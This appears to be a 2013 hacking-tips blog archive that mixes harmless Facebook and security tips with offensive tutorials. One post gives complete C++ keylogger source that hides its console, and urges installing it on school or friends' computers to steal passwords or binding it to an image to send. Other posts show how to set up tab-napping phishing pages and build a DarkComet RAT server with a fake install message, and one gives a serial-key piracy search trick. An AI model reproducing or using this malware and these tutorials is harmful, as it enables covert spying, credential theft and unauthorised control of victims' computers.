Friday, 13 December 2013

DOWNLOAD GOOGLE BOOKS FOR FREE

  DOWNLOAD GOOGLE BOOKS FOR FREE

                                                 


  here is a trick to download google books for free


1. Open your Internet Explorer (Not Firefox nor Chrome). Make sure that you are the admin of your computer. Then, go to the page in books.google.com that you want to download.

2. Now, go to "C:\Documents and Settings\%your admin name%\Local Settings\Temporary Internet Files\” of your computer. Delete all of the content of that folder.

3. In your Internet Explorer, refresh the page and browse-thru the pages of the books that you want to download.

4. Refresh the "Temporary Internet Files” folder. Copy all PNG files to another folder. You can distinguish PNG Files through its icon.
These files that you have just copied are, actually, the pages of the books that you have just browsed. Put it in one folder then read with ACDSee or another photo manager software.



Done!!!!

USE GOOGLE CHROME TO CHANGE WEBSITES

                                USE GOOGLE CHROME TO CHANGE WEBSITES

                                    

How to change the look of a website using google chrome

a simple trick to change the look of a website by editing page element

So to change the look follow these simple steps

1 - Highlight some text on a page

2 - Right click and click 'Inspect Element'

3 - A new Window should dock at the
bottom of Chrome


4 - Double click the highlighted line,
change the text and press enter You can also change images, links,
backgrounds and other content this way,
even prices on websites.



DONE !!!!

Thursday, 12 December 2013

HOW TO FIND SERIAL KEYS FROM GOOGLE

                                HOW TO FIND SERIAL KEYS FROM GOOGLE
                                     

Hello guys i got many request to find the key of many softwares and so i have written this article HOW TO FIND SERIAL KEY OF ANY SOFTWARE FROM GOOGLE as you all know google is one of the best search engine and you can also use it to find serial key of any softwares

so to find the serial key just follow these steps

1) go to google.com

2) write the name of the software you want key and add 94FBR at the end
      Eg :- if you want to find key of Avast then write   " AVAST 94FBR " (without quotes)

3) search it and you will find many sites with serial keys of that softwares

DONE !!!!

HOW TO CREATE A KEYLOGGER USING VISUAL C++ ???

                   HOW TO CREATE A KEYLOGGER USING VISUAL C++ ???
                                                         
Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install
this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++. Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code (Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

Wednesday, 11 December 2013

TRACK YOUR FACEBOOK ACTIVITY

                                   TRACK YOUR FACEBOOK ACTIVITY

Now you can track your every facebook activity example who deleted you , who has deactivated their account an etc

For this you have to open twentyfeet and sign up using facebook or twitter.

after then you will recive a email on all your facebook activity

below is a screen shot of the site


TIPS TO SECURE YOUR FACEBOOK ACCOUNT FROM GETTING HACKED

            TIPS TO SECURE YOUR FACEBOOK ACCOUNT FROM GETTING HACKED

                                          

According to facebook 7 accounts are hacked in every second and its too much so i have written this post
Here are some awesome tips to secure your facebook account from getting hacked
                                            

1) – Enable HTTPS ?

When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS
instead of HTTP. This encrypts your communications.
In fact, you will have to temporarily disable this feature any time you give access to a new application.
That alone should give you confidence that you have achieved a greater level of protection.


2) – Disable Online Chat ?

All of us have witnessed Facebook scams, with the most common being the infamous chat message …
“I’m in the US and have been mugged – please send money so I can get back home.”
While I have no technical basis for this, it stands to reason that the hackers get in through the chat
service. Every time I have noticed bogus comments allegedly made by me to my Facebook friends, it is
because I had previously used the online chat.
To disable chat just click on the little wheel in the right sidebar and take yourself offline. Then close the
window and make sure is registers as chat offline.


3) – Review Permissions Granted to Third Party Apps ?


When you grant access to Facebook apps, those permissions endure long after you stop using them. Go
to this link to review your Facebook app permissions – and disable any you are no longer using.
You will probably be surprised at the long list permissions your have previously granted!


4) – Activate Text Message Notifications ?

Facebook allows you to receive text notifications whenever your account is accessed from a device
other than your primary computer or mobile device.
You simply go to Account Settings and then to Security Settings to set-up the proper notifications to
your mobile device.
First go to login approvals – then login notifications.
You can only choose email or text notifications. By choosing text notifications you not only get an
immediate notice, but you also activate both your mobile device and your primary computer as
approved access points.


5) – Maintain Public and Private Email Addresses ?

The email address you use for Facebook should be distinct from the one you use where security is more
critical – such as your online banking or Paypal account.
If your Facebook account gets hacked its embarrassing. If that is the same email used on your more
secure accounts, now that vulnerability could be costly.
Obviously, if you are selective with your email addresses and periodically change your passwords, you
minimize your chances of being hacked.
Did you know that anyone can search Facebook for an email address? For example, if you are looking a
common name such as John Smith, you only need to search with their email to find the right one.
This is handy for finding your friends on Facebook, but also useful for hackers. The safe bet is to use
distinct passwords for your public and private email addresses.
There are even more ways to protect your Facebook and other online accounts, but these 5 are the
most essential, and they are specific to Facebook, which seems to be the site that is the most
vulnerable.

6) Select 4-5 as your trusted friends

Recently facebook launched a new feature called trusted friens as if u forgot your security question you can get help from your friends. to enable this go to security settings

Tuesday, 10 December 2013

HACK FACEBOOK ACCOUNT BY TAB NAPPING

                                     HACK FACEBOOK ACCOUNT BY TAB NAPPING 


                                  

Hello friends, in this article i am gonna show you how to Hack Facebook Accounts by Tab Napping Technique.Firstly you should know that Tab Napping is a new form ofphishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.



How does it works

Tab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressing
CTRL + T).

if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know

it has been replaced with a fake page.
fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.


This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping.


NOTE: If you don't have any prior knowledge of Phishing or don't have any Fake login page yet, then check this post HOW TO HACK A FACEBOOK ACCOUNT BY PHISHING


Lets start:


1. Create an Ordinary phishing page

First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phishing page

2. Install the Script
Download the Tab Napping script by CLICKING HERE
Open the text file containing the script with a text editor like Notepad and search use{ ctrl + f to find}  for the lines below;


http://username.site.com/fakepage.htm


Now in the above script, replace http://username.site.com/fakepage.htm with yourphishing url

Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically
redirects to your phishing page.

 Therefore you can modify the idle time too..
10000 milliseconds = 10 seconds

After you have edited the script, copy and paste it into the HTML of your site or blogger site.

Thats all. If you are having any problem with this tutorial feel free to comment.

HOW TO GET AUTO LIKES IN YOUR FACEBOOK POSTS

                         HOW TO GET AUTO LIKES IN YOUR FACEBOOK POSTS

                                            

Hello guys all of us wants to get likes on our facebook status so we get famous among our friends so here is a simple trick to get autolikes


First of all turn on your followers by going to settings > followers

Now turn your post to public in which you want likes

Now goto www.likelo.com

You can see the video tutorial on the home page


ITS 100 % SAFE I ALSO HAVE TRIED IT

GET FACEBOOK LIKES , TWITTER FOLLOERS, YOUTUBE FOLLOWERS, WEBSITES HITS ETC

GET FACEBOOK LIKES , TWITTER FOLLOERS, YOUTUBE FOLLOWERS, WEBSITES HITS
                             
Facebook is one of the best social networking site and everyone of us wants to get more likes..

If you want to get more likes for your facebook page then here i got a best way to do it.


ADDMEFAST

WHAT IS ADDMEFAST ?

 Addmefast is a great website to get facebook likes, facebook shares, twitter followers , youtube view , youtube followers , websites hits etc


 You will get 50 points after registering and you can earn more points by liking fb pages, going to websites, retweeting someones tweet , following someone in youtube , viewing a video etc

IS IT SAFE ?

Ya its fully safe and legit


HOW DO I JOIN ADDMEFAST ?

You can join addmefast by CLICKING HERE


But you do not need to be worried at all because i will soon post a trick on getting more points on addmefast


SO WHAT YOU ARE WAITING FOR CLICK HERE TO REGISTER IN ADDMEFAST

HOW TO HIDE MANAGER ID ON FACEBOOK PAGE

                    HOW TO HIDE MANAGER ID ON FACEBOOK PAGE
                                                                     
                                                                  

Facebook page has a manager who controls all the page. but ever thought what if your manager's ID gets hacked ?

So here is a intresting trick i found


HOW TO HIDE MANAGER ID IN FACEBOOK PAGE


1) First Make any New Email[ gmail only not any other ]
( remember email should be fresh
and shouldn't be attached with
any Facebook Profile ).


2) Then Go To Your Page Admin Roles :- and Add The Email and
Save It as Manager of Your Page!
The Email will be added
Automatically But Not will be on
Screen ( Just Hidden ).


3) Now Lets Suppose Your Page
Got Hacked or Someone cheated
you! You Completely Lost Your
Page Admin AccessWhat To do
Now ??


4) Yes, Go to the Email there
should be Email From Facebook
About Your Invitation of That
Page Which You added Accept It
as Manager of Page, now Make
New FB account with that Email
and Go to Message there will be
invitation open it and You are
Now Manager!


5) make a fb id with that gmail id and reemove the crap out

Monday, 9 December 2013

TIPS TO INCREASE TALKING ABOUT THIS OF A FACEBOOK FAN PAGE

           TIPS TO INCREASE TALKING ABOUT THIS OF A FACEBOOK FAN PAGE

                             
Facebook has introduce to a feature called talking about this on thier pages. it increases/decreases on the number of status/photos, number of comments/like/share and the total number of people who show your posts

so here is are some

TIPS TO INCREASE "TALKING ABOUT THIS" OF A FACEBOOK PAGE



TIP 1  : Post maximum number of post you can

TIP 2  : Share awesome posts by which likers like , share and comment on your posts

TIP 3  : On below your post tell people to like/comment/share [so as you write people will be encouraged to do so]

TIP 4  : Don't tag your page in others page nor you tag others page on your page

TIP 5  : Play games , take contest with your members [so they will comment on your posts]

TIP 6  : Share more photos and less status

TIP 7  : Share some of your page's post on your ID [but sometimes only otherwise people will ignore it]

TIP 8  : Don't copy jokes or other posts from others page [by this people will not like your post and it will              decrease talking about]

TIP 9  : Reply to peoples comments and their wall posts on your timeline

TIP 10 : Tell your likers as well as your friends to like , comment and SHARE your posts.



TRY ALL THIS THINGS IT WILL SURELY INCREASE TALKING ABOUT THIS OF YOUR PAGE

INVITE ALL FACEBOOK FRIENDS IN ONE CLICK

                                 INVITE ALL FACEBOOK FRIENDS IN ONE CLICK

                          

How To Invite ALL FACEBOOK Friends TO LIKE A PAGE IN ONE CLICK In One Click

1.Go To Firefox

2.Open Facebook Page And Invite Bar Scroll Down To Load All Friends.

3.Click On Firefox Button >> Web developer >> Scratchpad.

4.

javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()};

5.copy paste above lines there.

6.click on run


all done

 all friends selected in 10 to 20 second...



HOW TO CHANGE FB PAGE NAME WITH MORE THAN 200 LIKES

                    HOW TO CHANGE FB PAGE NAME WITH MORE THAN 200 LIKES

                                                                    

Facebook dont allow to change your page name after 200 likes but sometimes we come to know that by changing name of the page there will be more likers

So here is a trick to change it


Facebook recently launched a new page feature called "suggest and edit" we will use it to change the name of the page.


Now tell your friends and members to click on "suggest and edit" there will be a option PAGE NAME click onit and write new name..


EG : post it o your wall

Dear friends we found out that our page name has a mistake so you please click on suggest and edit and write this name..




After 15 of your friends do it you will get a option to change the name of the page after 200 likes also

HACK A ACCOUNT USING REMOTE ADMINISTRATION TOOL [RAT]

                        HACK A ACCOUNT USING REMOTE ADMINISTRATION TOOL [RAT]
                                                                                 

A remote administration tool (or RAT) is a program that allows certain persons to connect to
and manage remote computers in the Internet or across a local network. A remote
administration tool is based on the server and client technology. The server part runs on a
controlled computer and receives commands from the client, which is installed on other remote
host. A remote administration tool works in background and hides from the user. The person
who controls it can monitor user’s activity, manage files, install additional software, control the
entire system including any present application or hardware device, modify essential system
settings, turn off or restart a computer



Go on http://www.no-ip.com/, Create your Account and click on "Download".


Now Click on "Windows"

Now Click on "Download 3.0.4"

Now you must install No-DUP 3.0, Click on "Next"


Now, choose "Install Location" and click on "Next"

Now choose "Start Menu Folder" and Click on "Install"

Setup was completed successfully, click on "Close"

Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.

Now, click on "Add a Host"

Choose a "Hostname", enter your IP address and click on "Create Host".

Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"

Now, Select your "HOST" and click on "Save".

Done, you can close No-IP DUC 3.0

Download DarkComet v4.0 here and run DarkComet.

Click on [+], Choose your port (I advice 1604) and click on "Listen".

Now click on "Settings".

Click on "Mo-IP Updater" and type your No-IP informations.

Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your

informations and click on "Test network".

Click on "Module Startup" and choose your settings.

Click on "Install Message" and choose your fake message.

Now click on "Module Shield" and choose your settings.

Now click on "Build Module" and click on "Build Server".

CHANGE FACEBOOK PROFILE NAME AFTER CROSSING THE LIMIT

                CHANGE FACEBOOK PROFILE NAME AFTER CROSSING THE LIMIT

                         
Facebook has a limit that after a certain time you cant change your account name . you can only change it for 5 times so here is a trick to change account name after crossing the limit


Requirements:-
  • One government or any Id Proof which show your image and name clearly.
  • Choose your own Profile pic same of that person in id person.

  • Make sure that your account change name limit is full from Account settings. They show this message
"You can't update your name right now because you've already changed it too many times"
  • If you want to request then You need to fill request form then CLICK HERE.!
  •  Open this form from that account whose name you want to change
  • Now you need to enter the accurate information in request form.
  • Enter the accurate First, middle and then last new name in form which you want.
  • Then select the reason for changing name
  • Then upload Image of your correct document which clearly show the name you are using.
  • Then click on the send button and wait for a week for request approval
After the request approve Facebook will change your name automatically. Sometimes Facebook don't accept your request and they may mention the reason in your email. Possibly your new name do not match name policies that's why Facebook rejects new name.!!